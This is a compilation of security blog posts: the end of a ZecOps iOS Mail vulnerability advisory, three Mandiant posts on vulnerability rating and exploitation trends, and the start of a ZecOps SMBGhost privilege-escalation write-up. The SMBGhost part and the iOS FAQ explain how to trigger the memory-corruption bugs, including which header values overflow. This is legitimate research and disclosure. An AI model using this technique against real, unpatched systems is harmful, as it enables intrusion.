Apple patched both vulnerabilities in iOS 13.4.5 beta, as can be seen in the following screenshot below:

To mitigate these issues – you can use the latest beta available. If using a beta version is not possible, consider disabling Mail application and use Outlook, Edison Mail, or Gmail that are not vulnerable.

Disclosure timeline

  • February 19th 2020 – Suspected events reported to the Vendor under ZecOps responsible disclosure policy which allows immediate release for in-the-wild triggers
  • Ongoing communication between the affected vendor & ZecOps
  • March 23rd – ZecOps sent to the affected vendor a POC reproduction of the OOB Write vulnerability
  • March 25th – ZecOps shared a local POC for the OOB Write
  • March 31st – ZecOps confirmed a second vulnerability exists in the same area and the ability of a remote trigger (Remote Heap Overflow) – both vulnerabilities were triggered in the wild
  • March 31st – ZecOps shared a POC with the affected vendor for the remote heap-overflow vulnerability
  • April 7th – ZecOps shared a custom Mail Server to trigger the 0-click heap overflow vulnerability on iOS 13.4 / 13.4.1 easily by simply adding the username & password to Mail and downloading the emails
  • April 15/16th – Vendor patches both vulnerabilities in the publicly available beta
  • April 20th – We re-analyzed historical data and found additional evidence of triggers in the wild on VIPs and targeted personas. We sent an email notifying the vendor that we will have to release this threat advisory imminently in order  to enable organizations to safeguard themselves as attacker(s) will likely increase their activity significantly now that it’s patched in the beta
  • April 22nd – Public disclosure

FAQ

Q: Was the first and/or the second vulnerability exploited in the wild?

A: The suspected emails triggered code paths of both vulnerabilities in the wild, however, we think the first vulnerability (OOB Write) was triggered accidentally, and the main goal was to trigger the second vulnerability (Remote Heap Overflow).

  1. We have seen multiple triggers on the same users across multiple continents. 
  2. We examined the suspicious strings & root-cause (such as the 414141…41 events and mostly other events):
    1. We confirmed that this code path do not get randomly triggered.
    2. We confirmed the registers values did not originate by the targeted software or by the operating system.
    3. We confirmed it was not a red team exercise / POC tests.
    4. We confirmed that the controlled pointers containing 414141…41, as well as other controlled memory, were part of the data sent via email to the victim’s device.
  3. We verified that the bugs were remotely exploitable & reproduced the trigger.
  4. We saw similarities between the patterns used against at least a couple of the victims sent by the same attacker. 
  5. Where possible, we confirmed that the allocation size was intentional.
  6. Lastly, we verified that the suspicious emails were received and processed by the device – according to the stack trace and it should have been on the device / mail server. Where possible, together with the victims, we verified that the emails were deleted.

Based on the above, together with other information, we surmise that these vulnerabilities were actively exploited in the wild.

Q: Does an attacker have to trigger the first vulnerability first in order to trigger the second one?

A: No. An attacker would likely target the second vulnerability.

Q: Why are you disclosing these bugs before a full patch is available?

A: It’s important to understand the following:

  • These bugs alone cannot cause harm to iOS users – since the attackers would require an additional infoleak bug & a kernel bug afterwards for full control over the targeted device.
  • Both bugs were already disclosed during the publicly available beta update. The attackers are already aware that the golden opportunity with MobileMail/maild is almost over and they will likely use the time until a patch is available to attack as many devices as possible. 
  • With very limited data we were able to see that at least six organizations were impacted by this vulnerability – and the potential abuse of this vulnerability is enormous. We are confident that a patch must be provided for such issues with public triggers ASAP. 

It is our obligation to the public, our customers, partners, and iOS users globally to disclose these issues so people who are interested can protect themselves by applying the beta patch, or stop to use Mail and temporarily switch to alternatives that are not vulnerable to these bugs. 

We hope that with making this information public it will help to promote a faster patch.

Q: Can both vulnerabilities be triggered remotely?

A; The remote heap overflow has been proven to be possible to trigger remotely without any user-interaction (aka ‘0-click’) on iOS13. The OOB write can be triggered remotely with an additional vulnerability that allows to call an arbitrary selector, just like the one published by Google Project Zero here:

https://i.blackhat.com/USA-19/Wednesday/us-19-Silvanovich-Look-No-Hands-The-Remote-Interactionless-Attack-Surface-Of-The-iPhone.pdf – since we saw in the wild trigger for the first vulnerability, it is possible, although we think it was done by mistake (see above).

Q: Do end users require to perform any action for the exploitation to succeed?

A: On iOS 13 – no. On iOS 12 – it requires the victim to click on an email.

If an attacker controls the mail server, the attack can be performed without any clicks on iOS 12 too.

Q: Since when iOS is vulnerable to these bugs?

A: iOS is vulnerable to these bugs at least since iOS 6 (Sept’ 2012). We haven’t checked earlier versions.

Q: What can you do to mitigate the vulnerability:

A: The newly released beta update of 13.4.5 contains a patch for these vulnerabilities. If you cannot patch to this version instead of using Mail application consider to use other mail applications until a GA patch is available.

Q: Does an attacker need to send a very large email (e.g. 1-3gb)  to trigger the vulnerability?

A: No. Attackers may use tricks in multi-part / RTF, etc in order to consume the memory in a similar way without sending a large email.

Q: Does the vulnerability require additional information to succeed? 

A: Yes, an attacker would need to leak an address from the memory in order to bypass ASLR. We did not focus on this vulnerability in our research.

Q: What does the vulnerability allow:

A: The vulnerability allows to run remote code in the context of MobileMail (iOS 12) or maild (iOS 13). Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. Additional kernel vulnerability would provide full device access – we suspect that these attackers had another vulnerability. It is currently under investigation.

Q: Would end users notice any abnormal behavior once either vulnerabilities are triggered / exploited?

A: Besides a temporary slowdown of mobile mail application, users should not observe any other anomalous behavior.

When the exploit fails on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried afterwards and deletes the email. In failed attacks, the emails that would be sent by the attacker would show the message: "This message has no content." As seen in the following picture below:

Q: if the attackers fail, can they re-try to attack using the same vulnerability right after? 

A: On iOS 13 – attackers may try multiple times to infect the device silently and without user interaction. On iOS 12 – additional attempt would require the user to click on a newly received email by the attackers. The victim does not need to open an attachment and just viewing the email is sufficient to trigger the attack. 

Q: Can the attackers delete the received email after it was processed by the device and triggered the vulnerability?

A: Yes

Q; Is MacOS vulnerable to these vulnerabilities too? 

A: No

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest “branded” vulnerability on the news, it’s hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.


Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).


Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities


Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an in indication of what is occurring in the wild.


Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.


Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

Impact Type

Impact Consideration

Exploitation Consequence

The result of successful exploitation, such as privilege escalation or remote code execution

Confidentiality Impact

The extent to which exploitation can compromise the confidentiality of data on the impacted system

Integrity Impact

The extent to which exploitation allows attackers to alter information in impacted systems

Availability Impact

The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

Mitigating Factor

Mitigating Consideration

Exploitation Vector

What methods can be used to exploit the vulnerability?

Attacking Ease

How difficult is the exploit to use in practice?

Exploit Reliability

How consistently can the exploit execute and perform the intended malicious activity?

Access Vector

What type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability?

Access Complexity

How difficult is it to gain access needed for the vulnerability?

Authentication Requirements

Does the exploitation require authentication and, if so, what type of authentication?

Vulnerable Product Ubiquity

How commonly is the vulnerable product used in enterprise environments?

Product's Targeting Value

How attractive is the vulnerable software product or device to threat actors to target?

Vulnerable Configurations

Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.

Vulnerability

Vulnerability Description

NVD Rating

Mandiant Rating

Explanation

CVE-2019-12650

A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges

High

Low

This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges – level 15 admin privileges – to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this activity.

CVE-2019-5786

A use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. 

 

Medium

High

NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome.

As demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the required privileges needed to execute the vulnerability as well as the lack of observed exploitation. On the other hand, we rated the CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability pushed it to users through Chrome’s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect that the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities.

Attackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.


Figure 1: Percentage of vulnerabilities exploited at various times in relation to patch release

FireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days – before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.

We believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.


Figure 2: Time between vulnerability exploitation and patch issuance

­­­Time Between Disclosure and Patch Release

The average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.

Exploitation After Patch Release

While the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.

Time to Exploit for Vulnerabilities First Exploited after a Patch

Hours

Two vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602.

Days

12 percent of vulnerabilities were exploited within the first week following the patch release.

One Month

15 percent of vulnerabilities were exploited after one week but within one month of patch release.

Years

In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior.

Table 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure

Case Studies

We continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.


Figure 3: Timeline of activity for CVE-2018-15982

CVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups—Russia's APT28 and North Korea's APT37—as well as TEMP.MetaStrike and other financially motivated attackers.


Figure 4: Timeline of activity for CVE-2018-20250

CVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.


Figure 5: Timeline of Activity for CVE-2018-4878

CVE-2018-4878: A use after free vulnerability exists within the DRMManager’s “initialize” call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea’s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia’s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea’s TEMP.Hermit also using within approximately a month of disclosure.

Availability of PoC or Exploit Code

The availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).

Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events

Product

CVE

FireEye Risk Rating

1 day

WinRAR

CVE-2018-20250

Medium

1 day

Drupal

CVE-2018-7600

High

1 day

Cisco Adaptive Security Appliance

CVE-2018-0296

Medium

2 days

Apache Struts

CVE-2018-11776

High

2 days

Cisco Adaptive Security Appliance

CVE-2018-0101

High

2 days

Oracle WebLogic Server

CVE-2018-2893

High

2 days

Microsoft Windows Server

CVE-2018-8440

Medium

2 days

Drupal

CVE-2019-6340

Medium

2 days

Atlassian Confluence

CVE-2019-3396

High

Table 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018–Q3 2019

Trends by Targeted Products

FireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.

The majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.


Figure 6: Exploited vulnerabilities by vendor, Q1 2018–Q3 2019

Outlook and Implications

The speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.

We recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

FireEye Mandiant Threat Intelligence documented more zero-days exploited in 2019 than any of the previous three years. While not every instance of zero-day exploitation can be attributed to a tracked group, we noted that a wider range of tracked actors appear to have gained access to these capabilities. Furthermore, we noted a significant increase over time in the number of zero-days leveraged by groups suspected to be customers of companies that supply offensive cyber capabilities, as well as an increase in zero-days used against targets in the Middle East, and/or by groups with suspected ties to this region. Going forward, we are likely to see a greater variety of actors using zero-days, especially as private vendors continue feeding the demand for offensive cyber weapons.

Zero-Day Usage by Country and Group

Since late 2017, FireEye Mandiant Threat Intelligence noted a significant increase in the number of zero-days leveraged by groups that are known or suspected to be customers of private companies that supply offensive cyber tools and services. Additionally, we observed an increase in zero-days leveraged against targets in the Middle East, and/or by groups with suspected ties to this region.

Examples include:

  • A group described by researchers as Stealth Falcon and FruityArmor is an espionage group that has reportedly targeted journalists and activists in the Middle East. In 2016, this group used malware sold by NSO group, which leveraged three iOS zero-days. From 2016 to 2019, this group used more zero-days than any other group.
  • The activity dubbed SandCat in open sources, suspected to be linked to Uzbekistan state intelligence, has been observed using zero-days in operations against targets in the Middle East. This group may have acquired their zero-days by purchasing malware from private companies such as NSO group, as the zero-days used in SandCat operations were also used in Stealth Falcon operations, and it is unlikely that these distinct activity sets independently discovered the same three zero-days.
  • Throughout 2016 and 2017, activity referred to in open sources as BlackOasis, which also primarily targets entities in the Middle East and likely acquired at least one zero-day in the past from private company Gamma Group, demonstrated similarly frequent access to zero-day vulnerabilities.

We also noted examples of zero-day exploitation that have not been attributed to tracked groups but that appear to have been leveraged in tools provided by private offensive security companies, for instance:

  • In 2019, a zero-day exploit in WhatsApp (CVE-2019-3568) was reportedly used to distribute spyware developed by NSO group, an Israeli software company.
  • FireEye analyzed activity targeting a Russian healthcare organization that leveraged a 2018 Adobe Flash zero-day (CVE-2018-15982) that may be linked to leaked source code of Hacking Team.
  • Android zero-day vulnerability CVE-2019-2215 was reportedly being exploited in the wild in October 2019 by NSO Group tools.

Zero-Day Exploitation by Major Cyber Powers

We have continued to see exploitation of zero days by espionage groups of major cyber powers.

  • According to researchers, the Chinese espionage group APT3 exploited CVE-2019-0703 in targeted attacks in 2016.
  • FireEye observed North Korean group APT37 conduct a 2017 campaign that leveraged Adobe Flash vulnerability CVE-2018-4878. This group has also demonstrated an increased capacity to quickly exploit vulnerabilities shortly after they have been disclosed.
  • From December 2017 to January 2018, we observed multiple Chinese groups leveraging CVE-2018-0802 in a campaign targeting multiple industries throughout Europe, Russia, Southeast Asia, and Taiwan. At least three out of six samples were used before the patch for this vulnerability was issued.
  • In 2017, Russian groups APT28 and Turla leveraged multiple zero-days in Microsoft Office products. 

In addition, we believe that some of the most dangerous state sponsored intrusion sets are increasingly demonstrating the ability to quickly exploit vulnerabilities that have been made public. In multiple cases, groups linked to these countries have been able to weaponize vulnerabilities and incorporate them into their operations, aiming to take advantage of the window between disclosure and patch application. 

Zero-Day Use by Financially Motivated Actors

Financially motivated groups have and continue to leverage zero-days in their operations, though with less frequency than espionage groups.

In May 2019, we reported that FIN6 used a Windows server 2019 use-after-free zero-day (CVE-2019-0859) in a targeted intrusion in February 2019. Some evidence suggests that the group may have used the exploit since August 2018. While open sources have suggested that the group potentially acquired the zero-day from criminal underground actor "BuggiCorp," we have not identified direct evidence linking this actor to this exploit's development or sale.

Conclusion

We surmise that access to zero-day capabilities is becoming increasingly commodified based on the proportion of zero-days exploited in the wild by suspected customers of private companies. Possible reasons for this include:

  • Private companies are likely creating and supplying a larger proportion of zero-days than they have in the past, resulting in a concentration of zero-day capabilities among highly resourced groups.
  • Private companies may be increasingly providing offensive capabilities to groups with lower overall capability and/or groups with less concern for operational security, which makes it more likely that usage of zero-days will be observed.

It is likely that state groups will continue to support internal exploit discovery and development; however, the availability of zero-days through private companies may offer a more attractive option than relying on domestic solutions or underground markets. As a result, we expect that the number of adversaries demonstrating access to these kinds of vulnerabilities will almost certainly increase and will do so at a faster rate than the growth of their overall offensive cyber capabilities—provided they have the ability and will to spend the necessary funds.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar. 

Sourcing Note: Some vulnerabilities and zero-days were identified based on FireEye research, Mandiant breach investigation findings, and other technical collections. This paper also references vulnerabilities and zero-days discussed in open sources including  Google Project Zero's zero-day "In the Wild" Spreadsheet . While we believe these sources are reliable as used in this paper, we do not vouch for the complete findings of those sources. Due to the ongoing discovery of past incidents, we expect that this research will remain dynamic.

Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC

Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC

Introduction

CVE-2020-0796 is a bug in the compression mechanism of SMBv3.1.1, also known as “SMBGhost”. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about three weeks ago. Once we heard about it, we skimmed over the details and created a quick POC (proof of concept) that demonstrates how the bug can be triggered remotely, without authentication, by causing a BSOD (Blue Screen of Death). A couple of days ago we returned to this bug for more than just a remote DoS. The Microsoft Security Advisory describes the bug as a remote code execution (RCE) vulnerability, but there is no public POC that demonstrates RCE through this bug.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Initial Analysis

The bug is an integer overflow bug that happens in the Srv2DecompressData function in the srv2.sys SMB server driver. Here’s a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;

typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;

NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    If (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    ULONG FinalCompressedSize = 0;

    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }

    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }

    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

If we look carefully, we can notice that lines 20 and 31 can lead to an integer overflow for certain inputs. For example, most POCs that appeared shortly after the bug publication and crashed the system just used the 0xFFFFFFFF value for the Offset field. Using the value 0xFFFFFFFF triggers an integer overflow on line 20, and as a result less bytes are allocated.

Later, it triggers an additional integer overflow on line 31. The crash happens due to a memory access at the address calculated in line 30, far away from the received message. If the code verified the calculation at line 31, it would bail out early since the buffer length happens to be negative and cannot be represented, and that makes the address itself on line 30 invalid as well.

Choosing what to overflow

There are only two relevant fields that we can control to cause an integer overflow: OriginalCompressedSegmentSize and Offset, so there aren’t that many options. After trying several combinations, the following combination caught our eye: what if we send a legit Offset value and a huge OriginalCompressedSegmentSize value? Let’s go over the three steps the code is going to execute:

  1. Allocate: The amount of allocated bytes will be smaller than the sum of both fields due to the integer overflow.
  2. Decompress: The decompression will receive a huge OriginalCompressedSegmentSize value, treating the target buffer as practically having limitless size. All other parameters are unaffected thus it will work as expected.
  3. Copy: If it’s ever going to be executed (will it?), the copy will work as expected.

Whether or not the Copy step is going to be executed, it already looks interesting – we can trigger an out of bounds write on the Decompress stage since we managed to allocate less bytes then necessary on the Allocate stage.

As you can see, using this technique we can trigger an overflow of any size and content, which is a great start. But what is located beyond our buffer? Let’s find out!

Diving into SrvNetAllocateBuffer

To answer this question, we need to look at the allocation function, in our case SrvNetAllocateBuffer. Here is the interesting part of the function:

PALLOCATION_HEADER SrvNetAllocateBuffer(SIZE_T AllocSize, PALLOCATION_HEADER SourceBuffer)
{
    // ...

    if (SrvDisableNetBufferLookAsideList || AllocSize > 0x100100) {
        if (AllocSize > 0x1000100) {
            return NULL;
        }
        Result = SrvNetAllocateBufferFromPool(AllocSize, AllocSize);
    } else {
        int LookasideListIndex = 0;
        if (AllocSize > 0x1100) {
            LookasideListIndex = /* some calculation based on AllocSize */;
        }

        SOME_STRUCT list = SrvNetBufferLookasides[LookasideListIndex];
        Result = /* fetch result from list */;
    }

    // Initialize some Result fields...

    return Result;
}

We can see that the allocation function does different things depending on the required amount of bytes. Large allocations (larger than about 16 MB) just fail. Medium allocations (larger than about 1 MB) use the SrvNetAllocateBufferFromPool function for the allocation. Small allocations (the rest) use lookaside lists for optimization.

Note: There’s also the SrvDisableNetBufferLookAsideList flag which can affect the functionality of the function, but it’s set by an undocumented registry setting and is disabled by default, so it’s not very interesting.

